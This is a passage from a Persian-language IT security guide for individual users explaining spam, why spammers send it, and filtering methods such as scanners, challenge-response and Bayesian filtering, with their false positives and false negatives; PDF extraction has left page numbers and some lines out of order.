ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ؛ ﻳﻌﻨـﻲ ﺍﺟـﺎﺯﻩ ﺩﺍﺩﻩ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺁﺩﺭﺱ
ﭘﺴﺘﻲ ﺷﻤﺎ ﺑﺮﺍﻱ ﻫﻤﻪ ﻗﺎﺑﻞ ﻣﺸﺎﻫﺪﻩ ﺑﺎﺷﺪ.
Public Mailing List
Newsgroup
Ident Daemon
70
71
72
Domain Name
73
٨٣
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺷــﻤﺎ ﻭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻣــﺸﺘﺮﻳﻬﺎﻱ ﺩﻳﮕــﺮ ﺍﺭﺳــﺎﻝ
ﻣﻲ ﻛﻨﺪ ،ﺁﻳﺎ ﻫﺮﺯﻧﺎﻣﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺍﺳﺖ؟ ﭘﺎﺳـﺦ :ﺧﻴـﺮ.
ﺍﻣــﺎ ﺑﺮﻧﺎﻣــﺔ ﻏﺮﺑــﺎﻝﺳــﺎﺯ ﻫﺮﺯﻧﺎﻣــﻪ ﺩﺭ ISPﺷــﻤﺎ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺯﻣﺎﻥ ﺯﻳﺎﺩﻱ ﺭﺍ ﺻﺮﻑ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻦ
ﻛﻨﺪ ﻛﻪ ﺗﺸﺨﻴﺺ ﺩﻫﺪ ﭼﻨـﻴﻦ ﻧﺎﻣـﻪﺍﻱ ﻫﺮﺯﻧﺎﻣـﻪ
ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ.
•
ﺝ( ﭼــﺮﺍ ﻫﺮﺯﻧﺎﻣــﻪﻧــﻮﻳﺲﻫــﺎ ﺑــﺮﺍﻱ ﺍﻓــﺮﺍﺩ ﻫﺮﺯﻧﺎﻣــﻪ ﺍﺭﺳــﺎﻝ
ﻣﻲﻛﻨﻨﺪ؟ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺟﻮﺍﺏ :ﭼﻮﻥ ﺍﻳﻨﻜﺎﺭ ﺟﻮﺍﺏ ﻣﻲﺩﻫـﺪ!
ﺍﮔﺮ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴـﺪ ﺳـﺮﻳﻌﹰﺎ ﻣﺘﻮﺟـﻪ
ﻻ ﻫﺮﺯﻧﺎﻣﻪﻫـﺎ ﺩﺭ ﻣـﻮﺭﺩ
ﻳﻚ ﺍﻟﮕﻮ ﺩﺭ ﺁﻥ ﻣﻲﺷﻮﻳﺪ .ﻣﻌﻤﻮ ﹰ
ﻣﺴﺎﺋﻠﻲ ﻫﺴﺘﻨﺪ ﭼﻮﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﭘﻮﻝ ﻳﺎ ﭘﺲﺍﻧﺪﺍﺯ ﺁﻥ،
ﺍﺭﺗﻘﺎﻱ ﺯﻧﺪﮔﻲ ﻋﺎﻃﻔﻲ ﻳﺎ ﺧﺼﻮﺻﻲ ،ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻼﻣﺘﻲ.
ﺍﻳﻦ ﻣﻮﺿﻮﻋﺎﺕ ﻳﻚ ﻧﻘﻄﺔ ﻣﺸﺘﺮﻙ ﻣﻬﻢ ﺩﺍﺭﻧﺪ :ﺍﻏﻠﺐ ﻣـﺎ
ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺟﺪﻱ ﺩﺍﺭﻳﻢ ﻭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ
ﻣﺎ ﻧﻴﺰ ﺗﻮﺟﻪ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﻪ ﺁﻧﻬﺎ ﻣﻲﻛﻨﻴﻢ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺣﺘﻲ
ﺍﮔﺮ ﺩﺭﺻﺪ ﺑﺴﻴﺎﺭ ﺍﻧﺪﻛﻲ ﺍﺯ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ،ﺍﻳﻦ ﻧﺎﻣﻪﻫـﺎ
ﻼ ﭼﻴـﺰﻱ ﺣـﺪﻭﺩ ۱ﻧﺎﻣـﻪ ﺩﺭ ﻣﻴـﺎﻥ ﻫـﺮ
ﺭﺍ ﭘﻴﮕﻴﺮﻱ ﻛﻨﻨـﺪ )ﻣـﺜ ﹰ
۱۰۰،۰۰۰ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ( ﻫﺮﺯﻧﺎﻣﻪ ﻧﻮﻳﺲ ﻫـﺎﻳﻲ ﻛـﻪ ﭼﻨـﺪﻳﻦ
ﻣﻴﻠﻴﻮﻥ ﭘﻴﺎﻡ ﺩﺭ ﺭﻭﺯ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭘﻮﻝ ﺯﻳﺎﺩﻱ
ﺍﺯ ﺍﻳﻦ ﺭﺍﻩ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ.
ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﭼﻪ ﺑﺎﻳﺪ ﻛﺮﺩ؟
ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ﻣـﻲﺗـﻮﺍﻥ
ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻣﺤﺪﻭﺩ ﻭ ﻛﻨﺘﺮﻝ ﻛـﺮﺩ .ﺑﺮﺧـﻲ ﺍﺯ ﺩﻭﻟﺘﻬـﺎ ﺩﺭ ﺣـﻮﺯﺓ
ﻗﻀﺎﻳﻲ ﺧﻮﺩ ﻗﻮﺍﻧﻴﻨﻲ ﺭﺍ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﮔـﺴﺘﺮﺵ ﻫﺮﺯﻧﺎﻣـﻪ
ﺗــﺼﻮﻳﺐ ﻛــﺮﺩﻩﺍﻧــﺪ .ﺍﻛﺜــﺮ ISPﻫــﺎ ﻣﻌﺘﻘﺪﻧــﺪ ﻛــﻪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ
ﺗﺴﻬﻴﻼﺕ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺮﺧﻼﻑ ﺗﻮﺍﻓﻘﻨﺎﻣﻪﻫـﺎﻱ
ﻛﺎﺭﻱ ﺁﻧﻬﺎ ﺍﺳﺖ .ﺗﺼﻮﻳﺐ ﭼﻨﻴﻦ ﻗﻮﺍﻧﻴﻨﻲ ﻣﻲ ﺗﻮﺍﻧﺪ ﻣـﺆﺛﺮ ﺑﺎﺷـﺪ،
ﺍﻣﺎ ﺗﺎﻛﻨﻮﻥ ﺍﻋﻤﺎﻝ ﺍﻛﺜﺮ ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺑـﺴﻴﺎﺭ
ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻤـﺪﺓ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )ﻣﺎﻧﻨـﺪ ﺷـﺮﻛﺘﻬﺎ( ﺍﺯ
ﭘﺬﻳﺮﻓﺘﻦ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺍﺯ ﺳﻮﻱ ISPﻫـﺎﻳﻲ ﻣﻨﺘـﺸﺮ
ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﺟﺎﺯﺓ ﻓﻌﺎﻟﻴﺖ ﺑـﻪ ﻫﺮﺯﻧﺎﻣـﻪﻧـﻮﻳﺲﻫـﺎ ﺭﺍ ﻣـﻲﺩﻫﻨـﺪ
ﺍﻣﺘﻨﺎﻉ ﻣﻲﻭﺭﺯﻧﺪ .ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺆﺛﺮ ﻭﺍﻗﻊ ﺷﻮﺩ ،ﺯﻳﺮﺍ ISPﻫﺎ ﺭﺍ
ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻣﺘﻮﻗﻒ ﺳﺎﺯﻧﺪ.
ﻻ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺑﻲﮔﻨﺎﻫﻲ ﻛﻪ ﺗﻌﺪﺍﺩ
ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﻣﻌﻤﻮ ﹰ
ﻛﻤﻲ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﻣﻘﺎﺻﺪ ﻣﺨﺘﻠﻒ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨـﺪ ﻫـﻢ
ﺁﺳﻴﺐ ﻣﻲﺭﺳﺎﻧﺪ .ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺯﻳـﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ
ﺗﺸﺨﻴﺺ ﻫﺮﺯﻧﺎﻣﻪ ،ﺣﺬﻑ ﺁﻥ ﻭ ﻳـﺎ ﻫـﺸﺪﺍﺭ ﺑـﻪ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ
ﻣﺒﻨﻲ ﺑﺮ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ .ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺭﺍ
ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ISPﻳﺎ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﭘﺴﺘﻲ ٧٤ﺑﻪ ﺍﺟﺮﺍ
ﺩﺭ ﺁﻭﺭﺩ .ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﺤﺘﻮﺍﻱ ﻧﺎﻣﻪ ﻭ ﻣﻨﺸﺎﺀ ﺍﺭﺳﺎﻝ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ
ﻣﻲﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ﺑﻪ ﺳـﺨﺘﻲ ﻗﺎﺑـﻞ ﺍﺭﺯﻳـﺎﺑﻲ
ﻫﺴﺘﻨﺪ ﻋﻤﻠﻜﺮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻧﻴـﺰ ﻣﻌﻤـﻮ ﹰﻻ ﺩﺍﺭﺍﻱ ﺗـﺸﺨﻴﺺ
ﻣﻨﻔﻲ ﻧﺎﺩﺭﺳﺖ ) (False Negativeﻭ ﺗﺸﺨﻴﺺ ﻣﺜﺒﺖ ﻧﺎﺩﺭﺳـﺖ
) (False Positiveﻣﻲﺑﺎﺷﺪ.
False Negative
Negative
Falseﺯﻣـﺎﻧﻲ ﺭﺥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺑﺮﻧﺎﻣـﺔ
ﺟﺴﺘﺠﻮﮔﺮ ٧٥ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻳـﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺴﺖ ،ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﻫﺮﺯﻧﺎﻣﻪ ﺍﺳﺖ .ﺍﻳﻦ ﺑـﺪﺍﻥ
ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﻫﺮﺯﻧﺎﻣـﻪ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺍﺯ
ﻏﺮﺑﺎﻝ ﻋﺒﻮﺭ ﻛﻨـﺪ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﺍﺳـﺖ ﻛـﻪ ﮔﻔﺘـﻪ
ﻣﻲﺷﻮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ %۱۰۰ﻣﺆﺛﺮ ﻧﺒﺎﺷﺪ.
False Positive
False Positiveﺑـــﺪﻳﻦ ﻣﻌﻨﺎﺳـــﺖ ﻛـــﻪ ﺑﺮﻧﺎﻣـــﺔ
ﺟﺴﺘﺠﻮﮔﺮ ﺍﻇﻬﺎﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺑﻲﺿـﺮﺭ
ﻫﺮﺯﻧﺎﻣﻪ ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﺯﻳـﺎﺩﻱ ﺑـﻪ ﺑـﺎﺭ
ﻣﻲﺁﻭﺭﺩ ،ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﺩﺭ ﺍﺛـﺮ ﺍﻳـﻦ ﺗـﺸﺨﻴﺺ ،ﻧﺎﻣـﺔ
ﻓﺮﺳﺘﺎﺩﻩﺷﺪﻩ ﺑﺠﺎﻱ ﺗﺤﻮﻳﻞ ﺷﺪﻥ ،ﺣﺬﻑ ﮔـﺮﺩﺩ .ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺑﺎ False Positiveﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﺎﺩﻱ
ﻭ ﺑﻲﺿﺮﺭ ﺍﺯ ﺩﺳﺖ ﺑﺮﻭﻧﺪ ﻭ ﻏﻴﺮﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﺷﻮﻧﺪ.
Mail Client
Scanning Program
74
75
ﺑﺨﺶ ﺩﻭﻡ
ﺍﮔﺮ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺎﻭﻱ ﻣﻄﻠﺒﻲ ﺑﺎﺷﺪ ﻛﻪ
ﺑﺎ ﺗﻤﺎﻡ ﺗﻌﺎﺭﻳﻒ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﺗﻠﻘﻲ ﺷﻮﺩ ،ﺁﻳﺎ ﺣﺘﻤـﹰﺎ
ﻫﺮﺯﻧﺎﻣﻪ ﺍﺳﺖ؟ ﭘﺎﺳﺦ :ﺑﻠﻪ؛ ﺍﻣﺎ ﺗﻨﻬـﺎ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ
ﻼ ﺍﮔـﺮ ﺍﻳـﻦ
ﺍﺻﻞ ﺁﻥ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ .ﺍﻣﺎ ﻣـﺜ ﹰ
ﻧﺎﻣـــﻪ ﺍﺯ ﺳـــﻮﻱ ﻳﻜـــﻲ ﺍﺯ ﺧﻮﺍﻧﻨـــﺪﮔﺎﻥ ﺑـــﺮﺍﻱ
ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﻓﺮﺳﺘﺎﺩﻩ ﻭ ﺩﺭ ﺁﻥ ﻣﺜﺎﻟﻬـﺎﻱ
ﺟﺎﻟﺒﻲ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪﻫـﺎ ﺫﻛـﺮ ﺷـﺪﻩ ﺑﺎﺷـﺪ
ﻣﻄﻤﺌﻨﹰﺎ ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺴﺖ ﻭ ﻧﺒﺎﻳﺪ ﻏﺮﺑﺎﻝ ﺷﻮﺩ.
ﻣـﺸﻜﻞ ﻭ ﭘﺮﻫﺰﻳﻨـﻪ ﺑـﻮﺩﻩ ﻭ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﻣـﻮﺍﺭﺩ ﻫـﻴﭻ ﺭﺍﻫﻜـﺎﺭ
ﺍﺟﺮﺍﻳﻲ ﺑﺮﺍﻱ ﺁﻥ ﺍﻧﺪﻳﺸﻴﺪﻩ ﻧﺸﺪﻩ ﺍﺳﺖ.
٨٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻫﺪﻑ ﺑﺮﻧﺎﻣﻪ ﻫـﺎﻱ ﺟـﺴﺘﺠﻮﻱ ﻫﺮﺯﻧﺎﻣـﻪ ﺑـﻪ ﺣـﺪﺍﻗﻞ ﺭﺳـﺎﻧﺪﻥ
False Negativeﻭ ﺍﺯ ﺑــﻴﻦ ﺑــﺮﺩﻥ False Positive
ﻻ
ﻣــﻲﺑﺎﺷــﺪ .ﻣﺘﺄﺳــﻔﺎﻧﻪ ﻛــﺎﻫﺶ False Negativeﻣﻌﻤــﻮ ﹰ
False Positiveﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ .ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺑـﻪ ﻫـﺮ
ﺩﻟﻴﻠﻲ ﻧﻴﺎﺯ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﺒﻴﻪ ﺑـﻪ ﻫﺮﺯﻧﺎﻣـﻪ
ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺍﻳﻦ ﻃﺮﻳﻖ ﺁﺳـﻴﺐ ﺑﻴﻨﻨـﺪ .ﺁﺧـﺮﻳﻦ ﻧﻤﻮﻧـﺔ
ﮔﺰﺍﺭﺵﺷﺪﺓ ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺧﺒﺮﻧﺎﻣـﺔ ﺩﺍﻧـﺸﮕﺎﻫﻲ ﺑـﻮﺩ
ﻛﻪ ﺩﺭ ﺁﻥ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﻣﻄﺎﻟﺒﻲ ﻣﻄﺮﺡ ﺷـﺪﻩ ﺑـﻮﺩ .ﺍﺯ
ﺁﻧﺠﺎ ﻛﻪ ﺧﺒﺮﻧﺎﻣﻪ ﺩﺍﺭﺍﻱ ﻣﺜﺎﻟﻬـﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺑـﻮﺩ،
ﺗﻮﺳﻂ ﺟـﺴﺘﺠﻮﮔﺮﻫﺎ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻫﺮﺯﻧﺎﻣـﻪ ﺷﻨﺎﺳـﺎﻳﻲ ﺷـﺪ ﻭ
ISPﻫﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺁﻧﺮﺍ ﻏﺮﺑﺎﻝ ﻭ ﺣﺬﻑ ﻧﻤﻮﺩﻧﺪ.
ﻋﻼﻭﻩ ﺑﺮ ﺟـﺴﺘﺠﻮﮔﺮﻫﺎﻱ ﻫﺮﺯﻧﺎﻣـﻪ ،ﺭﻭﺷـﻬﺎﻱ ﻏﺮﺑـﺎﻝﺳـﺎﺯﻱ
ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﻓﻨﻮﻥ ﭘﺮﺳﺶ -ﭘﺎﺳﺦ ٧٦ﺍﺳﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ .ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻧﺎﻣـﻪﺍﻱ ﺍﺯ ﻳـﻚ ﻓﺮﺳـﺘﻨﺪﺓ
ﻧﺎﺷﻨﺎﺱ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ ،ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ )ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﺑﺎﺯ
ﻛﻨﺪ( ﻣﺘﻮﻗﻒ ﻣﻲ ﮔﺮﺩﺩ .ﺳﭙﺲ ﭘﺮﺳﺸﻲ ﺑـﺮﺍﻱ ﻓﺮﺳـﺘﻨﺪﻩ ﺍﺭﺳـﺎﻝ
ﻣــﻲﺷــﻮﺩ ﻭ ﺩﺭ ﺁﻥ ﺍﺯ ﻭﻱ ﺩﺭﺧﻮﺍﺳــﺖ ﻣــﻲﮔــﺮﺩﺩ ﻧﺎﻣــﻪﺍﻱ ﻛــﻪ
ﻓﺮﺳﺘﺎﺩﻩ ﺍﺳﺖ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﻨﺪ ﺗـﺎ ﺛﺎﺑـﺖ ﺷـﻮﺩ ﺁﻥ ﻧﺎﻣـﻪ ﺍﺯ ﺳـﻮﻱ
ﻫﻤﺎﻥ ﻓﺮﺩ ﺍﺳﺖ ﻭ ﻧﻪ ﺍﺯ ﺟﺎﻧﺐ ﺷﺨﺺ ﺩﻳﮕﺮ ﻳﺎ ﻳﻚ ﻧـﺮﻡﺍﻓـﺰﺍﺭ.
ﻓﺮﻡ ﺗﺄﻳﻴﺪﻳﻪ ﭼﻨﺎﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﻛﻪ ﺑﻄـﻮﺭ ﺧﻮﺩﻛـﺎﺭ ﻧﻤـﻲﺗﻮﺍﻧـﺪ
ﻣﺪﻳﺮﻳﺖ ﺷﻮﺩ ﻭ ﻧﻴﺰ ﺑﺮﺍﻱ ﻫﺮﺯﻧﺎﻣﻪﻫﺎﻱ ﺑﻌﺪﻱ ﻣﺆﺛﺮ ﻧﻴﺴﺖ .ﺍﮔـﺮ
ﺗﺎ ﭼﻨﺪ ﺭﻭﺯ ﻫﻴﭻ ﺗﺄﻳﻴﺪﻳﻪﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻧﺸﻮﺩ ،ﻧﺎﻣﻪ ﺑﺠـﺎﻱ ﺗﺤﻮﻳـﻞ
ﺷﺪﻥ ،ﺣﺬﻑ ﻣﻲﮔﺮﺩﺩ .ﻣﺸﻜﻞ ﺍﻳﻦ ﺭﻭﺵ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻴﺎﺯﻣﻨـﺪ
ﻣﺪﺍﺧﻠﺔ ﺩﺳﺘﻲ ﻓﺮﺳﺘﻨﺪﻩ ﺍﺳﺖ .ﺍﮔﺮ ﻧﺎﻣـﻪﺍﻱ ﺭﺍ ﺑﻔﺮﺳـﺘﻴﺪ ﻭ ﻗـﺎﺩﺭ
ﻧﺒﺎﺷﻴﺪ ﻛﻪ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺖ ﺗﺄﻳﻴﺪﻳﻪ ﺳﺮﻳﻌﹰﺎ ﭘﺎﺳﺦ ﺩﻫﻴﺪ ﻧﺎﻣـﺔ ﺷـﻤﺎ
ﺗﺤﻮﻳﻞ ﻧﺨﻮﺍﻫﺪ ﺷﺪ .ﻫﻤﭽﻨﻴﻦ ﺍﮔﺮ ﺩﻭ ISPﺑﺼﻮﺭﺕ ﻣﺘﻘﺎﺑـﻞ ﺍﺯ
ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻫﺮﮔـﺰ ﺍﺯ ﻳﻜـﺪﻳﮕﺮ
ﻧﺎﻣـﻪﺍﻱ ﺩﺭﻳﺎﻓـﺖ ﻧﻜﻨﻨـﺪ؛ ﺯﻳـﺮﺍ ﺍﻭﻟـﻴﻦ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ ﻧﺎﻣــﻪ ﺭﺍ
ﻧﻤﻲﺑﻴﻨﺪ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺗﺄﻳﻴـﺪ ﺷـﺪﻩ ﺑﺎﺷـﺪ ،ﻭ ﺗﻘﺎﺿـﺎﻱ ﺗﺄﻳﻴـﺪ ﻧﻴـﺰ
ﺍﺭﺳﺎﻝ ﻧﺨﻮﺍﻫﺪ ﺷﺪ ،ﭼﻮﻥ ﻓﺮﺳﺘﻨﺪﺓ ﺁﻥ ﻧﺎﺷﻨﺎﺱ ﺍﺳﺖ .ﺑﺮﺧـﻲ ﺍﺯ
ﺻﺎﻓﻴﻬﺎﻱ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﻧﺎﻣﻪﻫـﺎﻱ ﻣـﺸﻜﻮﻙ ﺭﺍ ﺣـﺬﻑ
ﻛﻨﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻳﻚ ﭘﻮﺷﺔ ﻣﺨﺼﻮﺹ ﻗﺮﺍﺭ ﻣﻲ ﺩﻫﻨـﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ
ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻄﻮﺭ ﻣﺘﻨﺎﻭﺏ ﭘﻮﺷﺔ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ ﺗـﺎ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ﻗﺮﺑﺎﻧﻴﻬﺎﻱ False Positive
ﻧﻴﺴﺘﻨﺪ.
Challenge-Response
76
ﺭﻭﺵ ﺍﻣﻴﺪﻭﺍﺭﻛﻨﻨــﺪﺓ ﺟﺪﻳــﺪ ﺿــﺪ ﻫﺮﺯﻧﺎﻣــﻪ ﺭﻭﺷــﻲ ﺑــﻪ ﻧــﺎﻡ
Bayesian Filteringﺍﺳـــﺖ .ﺩﺭ ﺍﻳـــﻦ ﺭﻭﺵ ﻗـــﻮﺍﻧﻴﻦ
ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ﺑﺎ ﺷﻨﺎﺧﺖ ﺷﻤﺎ ﺍﺯ ﻫﺮﺯﻧﺎﻣﻪ ﺍﺻﻼﺡ ﻣﻲ ﺷـﻮﺩ .ﺍﻳـﻦ
ﻗﻮﺍﻧﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩﺍﻱ ﻣﺘﻐﻴـﺮ ﺑﺎﺷـﻨﺪ.
ﻫﺪﻑ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ،ﺁﻣﻮﺯﺵ ﺩﻳﺪﻥ ﺑﺮﻧﺎﻣﻪ ﻏﺮﺑـﺎﻝﺳـﺎﺯ ﺍﺯ ﺭﻓﺘـﺎﺭ
ﺷﻤﺎ ﺍﺳﺖ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﻓﺮﺩ ﻣﻮﺭﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫـﺪ ﻭ
ﻻ ﺑﻌﻨﻮﺍﻥ ﻫﺮﺯﻧﺎﻣﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻧﻤﻲﺷـﻮﻧﺪ ﺍﻣـﺎ
ﻣﺤﺘﻮﻳﺎﺗﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﻣﻮﺭﺩ ﺗﻮﺟـﻪ ﺷـﻤﺎ ﻧﻴـﺴﺘﻨﺪ ﺭﺍ ﺭﺩ ﻛﻨـﺪ .ﺻـﺎﻓﻴﻬﺎﻱ
